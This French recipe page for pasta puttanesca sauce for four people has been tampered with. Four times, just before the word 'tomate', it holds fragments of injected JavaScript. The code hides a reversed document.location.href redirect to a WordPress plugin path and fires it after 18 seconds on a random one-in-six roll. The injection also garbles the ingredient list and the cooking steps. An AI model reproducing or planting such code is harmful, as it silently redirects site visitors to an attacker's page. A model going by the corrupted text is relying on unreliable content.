
PATES SAUCE PUTTANESCA
Pour 4 pers.
INGRÉDIENTS :
– 2 boites de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates concassées (2 x 425g)
– Concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate : 2 CS.
– 2 gousses d’ail
– 1 oignon émincé finement
– Câpres : 2 CS.
– Petit bocal d’anchois au sel
– Petite boîte d’olives noires
– Sucre brun : 1 CS.
– Fond de poisson (à défaut un bouillon cube de poule) : 1 CS.
– huile d’olive
– sel & poivre
Faire revenir l’ail & l’oignon dans un peu d’huile. Rajouter le concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate et cuire 1 minute
Couper les anchois en petits morceaux, couper les olives en deux.
Rajouter les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates concassées, les câpres, les anchois, les olives, le sucre et le fond de poisson. Porter à ébullition puis couvrir et baisser le feu au minimum.
Cuire 1 heure environ, la sauce doit bien réduire. Mélanger régulièrement.
Vous pouvez servir cette sauce avec les pâtes de votre choix.
Bon appétit !
Le petit mot de Joanne : J’ai une préférence pour les “penne” semi-complètes.
